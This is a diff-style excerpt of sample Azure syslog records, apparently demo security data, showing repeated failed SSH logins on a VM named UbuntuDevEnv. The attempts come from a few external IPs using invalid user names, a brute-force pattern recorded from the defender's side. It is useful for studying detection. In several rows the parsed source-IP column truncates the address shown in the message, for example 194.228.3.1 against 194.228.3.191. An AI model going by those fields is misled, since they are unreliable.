+19065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:23:12,UbuntuDevEnv,2019-06-26 12:23:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,110944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:23:14,UbuntuDevEnv,2019-06-26 12:23:13,auth,UbuntuDevEnv,info,Failed password for invalid user bharat from 27.106.45.6 port 40890 ssh2,110944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bharat,27.106.45.6,40890,,
+19067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:23:14,UbuntuDevEnv,2019-06-26 12:23:13,auth,UbuntuDevEnv,info,Disconnected from invalid user bharat 27.106.45.6 port 40890 [preauth],110944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bharat,27.106.45.6,40890,,
+19068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:23:14,UbuntuDevEnv,2019-06-26 12:23:13,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 40890:11: Bye Bye [preauth],110944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,40890,,
+19069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:28:15,UbuntuDevEnv,2019-06-26 12:28:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6  user=test,112019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,27.106.45.6,,0,
+19070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:28:16,UbuntuDevEnv,2019-06-26 12:28:16,auth,UbuntuDevEnv,info,Failed password for test from 27.106.45.6 port 37946 ssh2,112019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,37946,,
+19071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:28:17,UbuntuDevEnv,2019-06-26 12:28:16,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 37946:11: Bye Bye [preauth],112019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,37946,,
+19072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:28:17,UbuntuDevEnv,2019-06-26 12:28:16,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 27.106.45.6 port 37946 [preauth],112019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,27.106.45.6,37946,,
+19073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:30:02,UbuntuDevEnv,2019-06-26 12:30:02,auth,UbuntuDevEnv,info,Invalid user ts3 from 27.106.45.6 port 46376,112394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,27.106.45.6,46376,,
+19074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:30:02,UbuntuDevEnv,2019-06-26 12:30:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,112394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+19075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:30:02,UbuntuDevEnv,2019-06-26 12:30:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,112394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:30:04,UbuntuDevEnv,2019-06-26 12:30:04,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 27.106.45.6 port 46376 ssh2,112394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,27.106.45.6,46376,,
+19077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:30:05,UbuntuDevEnv,2019-06-26 12:30:04,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 27.106.45.6 port 46376 [preauth],112394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,27.106.45.6,46376,,
+19078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:30:05,UbuntuDevEnv,2019-06-26 12:30:04,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 46376:11: Bye Bye [preauth],112394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,46376,,
+19079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:31:46,UbuntuDevEnv,2019-06-26 12:31:45,auth,UbuntuDevEnv,info,Invalid user lucasb from 27.106.45.6 port 54806,112855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,27.106.45.6,54806,,
+19080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:31:46,UbuntuDevEnv,2019-06-26 12:31:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,112855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:31:46,UbuntuDevEnv,2019-06-26 12:31:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,112855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+19082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:31:47,UbuntuDevEnv,2019-06-26 12:31:47,auth,UbuntuDevEnv,info,Failed password for invalid user lucasb from 27.106.45.6 port 54806 ssh2,112855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,27.106.45.6,54806,,
+19083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:31:47,UbuntuDevEnv,2019-06-26 12:31:47,auth,UbuntuDevEnv,info,Disconnected from invalid user lucasb 27.106.45.6 port 54806 [preauth],112855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,27.106.45.6,54806,,
+19084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:31:47,UbuntuDevEnv,2019-06-26 12:31:47,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 54806:11: Bye Bye [preauth],112855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,54806,,
+19085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:16,UbuntuDevEnv,2019-06-26 12:50:15,auth,UbuntuDevEnv,info,Invalid user z from 194.228.3.191 port 38362,116874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,z,194.228.3.1,38362,,
+19086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:16,UbuntuDevEnv,2019-06-26 12:50:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:16,UbuntuDevEnv,2019-06-26 12:50:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,116874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+19088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:18,UbuntuDevEnv,2019-06-26 12:50:18,auth,UbuntuDevEnv,info,Failed password for invalid user z from 194.228.3.191 port 38362 ssh2,116874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,z,194.228.3.1,38362,,
+19089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:18,UbuntuDevEnv,2019-06-26 12:50:18,auth,UbuntuDevEnv,info,Disconnected from invalid user z 194.228.3.191 port 38362 [preauth],116874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,z,194.228.3.1,38362,,
+19090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:18,UbuntuDevEnv,2019-06-26 12:50:18,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 38362:11: Bye Bye [preauth],116874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,38362,,
+19091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:35,UbuntuDevEnv,2019-06-26 12:50:35,auth,UbuntuDevEnv,info,Invalid user tigrou from 27.106.45.6 port 34601,116947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,27.106.45.6,34601,,
+19092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:35,UbuntuDevEnv,2019-06-26 12:50:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:35,UbuntuDevEnv,2019-06-26 12:50:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,116947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+19094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:38,UbuntuDevEnv,2019-06-26 12:50:37,auth,UbuntuDevEnv,info,Failed password for invalid user tigrou from 27.106.45.6 port 34601 ssh2,116947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,27.106.45.6,34601,,
+19095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:38,UbuntuDevEnv,2019-06-26 12:50:37,auth,UbuntuDevEnv,info,Disconnected from invalid user tigrou 27.106.45.6 port 34601 [preauth],116947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,27.106.45.6,34601,,
+19096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:50:38,UbuntuDevEnv,2019-06-26 12:50:37,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 34601:11: Bye Bye [preauth],116947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,34601,,
+19097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:22,UbuntuDevEnv,2019-06-26 12:51:22,auth,UbuntuDevEnv,info,Did not receive identification string from 139.199.34.112 port 40058,117181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,40058,,
+19098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:22,UbuntuDevEnv,2019-06-26 12:51:22,auth,UbuntuDevEnv,info,Invalid user zhouh from 201.48.54.81 port 51319,117187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,201.48.54.8,51319,,
+19099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:22,UbuntuDevEnv,2019-06-26 12:51:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:22,UbuntuDevEnv,2019-06-26 12:51:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,117187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+19101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:24,UbuntuDevEnv,2019-06-26 12:51:24,auth,UbuntuDevEnv,info,Failed password for invalid user zhouh from 201.48.54.81 port 51319 ssh2,117187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,201.48.54.8,51319,,
+19102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:25,UbuntuDevEnv,2019-06-26 12:51:24,auth,UbuntuDevEnv,info,Disconnected from invalid user zhouh 201.48.54.81 port 51319 [preauth],117187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,201.48.54.8,51319,,
+19103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:25,UbuntuDevEnv,2019-06-26 12:51:24,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 51319:11: Bye Bye [preauth],117187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,51319,,
+19104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:40,UbuntuDevEnv,2019-06-26 12:55:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:40,UbuntuDevEnv,2019-06-26 12:55:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,118102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+19106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:40,UbuntuDevEnv,2019-06-26 12:55:39,auth,UbuntuDevEnv,info,Invalid user tomcat from 27.106.45.6 port 59879,118102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,27.106.45.6,59879,,
+19107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:41,UbuntuDevEnv,2019-06-26 12:55:41,auth,UbuntuDevEnv,info,Failed password for invalid user tomcat from 27.106.45.6 port 59879 ssh2,118102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,27.106.45.6,59879,,
+19108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:41,UbuntuDevEnv,2019-06-26 12:55:41,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 59879:11: Bye Bye [preauth],118102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,59879,,
+19109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:41,UbuntuDevEnv,2019-06-26 12:55:41,auth,UbuntuDevEnv,info,Disconnected from invalid user tomcat 27.106.45.6 port 59879 [preauth],118102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,27.106.45.6,59879,,
+19110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:56:14,UbuntuDevEnv,2019-06-26 12:56:13,auth,UbuntuDevEnv,info,Invalid user casen from 194.228.3.191 port 44201,118231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,casen,194.228.3.1,44201,,
+19111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:56:14,UbuntuDevEnv,2019-06-26 12:56:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:56:14,UbuntuDevEnv,2019-06-26 12:56:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,118231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+19113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:56:16,UbuntuDevEnv,2019-06-26 12:56:16,auth,UbuntuDevEnv,info,Failed password for invalid user casen from 194.228.3.191 port 44201 ssh2,118231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,casen,194.228.3.1,44201,,
+19114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:56:16,UbuntuDevEnv,2019-06-26 12:56:16,auth,UbuntuDevEnv,info,Disconnected from invalid user casen 194.228.3.191 port 44201 [preauth],118231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,casen,194.228.3.1,44201,,
+19115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:56:16,UbuntuDevEnv,2019-06-26 12:56:16,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 44201:11: Bye Bye [preauth],118231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,44201,,
+19116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:37,UbuntuDevEnv,2019-06-26 12:57:36,auth,UbuntuDevEnv,info,Invalid user xq from 201.48.54.81 port 48774,118523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xq,201.48.54.8,48774,,
+19117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:37,UbuntuDevEnv,2019-06-26 12:57:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,118523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+19118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:37,UbuntuDevEnv,2019-06-26 12:57:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:39,UbuntuDevEnv,2019-06-26 12:57:38,auth,UbuntuDevEnv,info,Failed password for invalid user xq from 201.48.54.81 port 48774 ssh2,118523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xq,201.48.54.8,48774,,
+19120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:39,UbuntuDevEnv,2019-06-26 12:57:38,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 48774:11: Bye Bye [preauth],118523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,48774,,
+19121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:39,UbuntuDevEnv,2019-06-26 12:57:38,auth,UbuntuDevEnv,info,Disconnected from invalid user xq 201.48.54.81 port 48774 [preauth],118523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xq,201.48.54.8,48774,,
+19122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:48,UbuntuDevEnv,2019-06-26 12:57:47,auth,UbuntuDevEnv,info,Invalid user nagios from 194.228.3.191 port 52722,118565,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,194.228.3.1,52722,,
+19123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:48,UbuntuDevEnv,2019-06-26 12:57:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,118565,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+19124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:48,UbuntuDevEnv,2019-06-26 12:57:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118565,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
